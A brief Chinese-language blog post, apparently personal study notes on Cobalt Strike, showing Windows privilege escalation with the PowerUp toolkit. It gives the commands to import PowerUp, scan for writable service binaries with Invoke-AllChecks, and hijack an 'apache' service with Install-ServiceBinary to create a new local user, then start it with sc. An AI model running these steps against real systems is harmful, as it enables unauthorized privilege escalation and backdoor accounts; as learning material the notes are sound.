前言
- Cobalt Strike基本学习
powershell提权
首先需要用到PowerTools-master里的一些工具powerup提权
首先导入powerup
1 | powershell-import |
接着,Invoke-AllChecks来扫描可用路径
找我们的权限也能更改的文件
其中F表示可操作,刚好我们的权限可以
绑定命令到这个服务上增加用户
1 | powershell Install-ServiceBinary -ServiceName apache -UserName rockyou -Password test123test |
接着使用shell sc 来控制服务的启动服务,就会生成一个用户
我的个人博客
孤桜懶契:http://gylq.gitee.io